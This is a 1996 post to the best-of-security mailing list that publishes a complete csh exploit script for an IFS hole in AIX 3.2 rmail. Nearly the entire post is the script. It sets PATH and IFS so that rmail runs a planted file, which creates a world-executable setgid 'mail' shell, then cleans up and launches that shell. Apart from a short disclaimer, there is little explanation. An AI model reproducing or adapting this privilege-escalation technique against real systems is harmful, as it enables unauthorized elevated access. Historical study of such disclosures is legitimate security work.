Date: Wed, 17 Apr 1996 00:02:58 -0600 (MDT)

From: Andrew Green <agreen@bentley.UnivNorthCo.EDU>

To: best-of-security@suburbia.net

Subject: BoS: AIX v3 rmail exploit.



Since IBM thought it was important enough to release an announcement 

about it, it MUST be worth posting the exploit, right?!  :)



Neither I, nor the University of Northern Colorado will be held responsible

for use/misuse of this information.  



Here's a relic for y'all.

#!/bin/csh

#  IFS hole in AIX3.2 rmail gives egid=mail.  Apr. 1994



#  Setup needed files.



mkdir /tmp/.rmail

cd /tmp/.rmail



cat <<EOF>usr

	cp sh mailsh

	chmod 2777 mailsh

EOF

chmod 777 usr

ln -s /bin/sh . 



#  Set PATH, IFS, and run rmail.



setenv PATH .:$PATH

setenv IFS /

echo "cheezy mail hack" | rmail joeuser@nohost.com

unsetenv IFS

rm -f usr sh    #   minor cleanup.  

echo "Attempting to run sgid shell."

./mailsh







Andrew Green

agreen@bentley.univnorthco.edu